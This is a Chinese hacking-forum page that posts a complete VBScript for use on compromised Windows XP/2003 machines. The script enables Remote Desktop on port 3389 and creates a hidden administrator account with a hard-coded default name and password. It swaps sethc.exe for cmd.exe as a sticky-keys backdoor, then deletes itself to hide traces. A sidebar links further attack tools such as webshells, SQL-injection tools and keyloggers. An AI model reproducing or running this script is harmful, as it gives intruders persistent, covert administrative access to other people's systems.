[推荐]xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本vbs| 以下是引用片段: on error resume next const HKEY_LOCAL_MACHINE = &H80000002 strComputer = "." Set StdOut = WScript.StdOut Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_ strComputer & "\root\default:StdRegProv") strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server" oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server" strValueName = "fDenyTSConnections" dwValue = 0 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" strValueName = "PortNumber" dwValue = 3389 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" strValueName = "PortNumber" dwValue = 3389 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue on error resume next dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath On Error Resume Next Dim obj, success Set obj = CreateObject("WScript.Shell") success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True) CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName) |
| 入侵工具Knark的分析及防范 | 01-14 | |
| 十三WEBSHELL终结版后门的去除过 | 12-14 | |
| hijack(红狼安全小组原创作品 - | 11-29 | |
| 高级内网渗透工具:Paris (创建VP | 11-01 | |
| ASP+MSSQL注入工具 web版 beta 3 | 10-05 | |
| MSSQL cookie注入工具[web版] | 09-27 | |
| 最酷的windows后门 | 09-10 | |
| Radmin 3.0 Remote Control 英文 | 08-17 | |
| X-Spoof使用详解+工具 | 08-17 | |
| ASPX傀儡木乃伊(ASPX SYN DDOS) | 08-14 | |
| 黑界神兵-cain | 08-06 | |
| 一个穿透卡巴的傻x智能键盘记录器 | 08-03 | |
您现在的位置: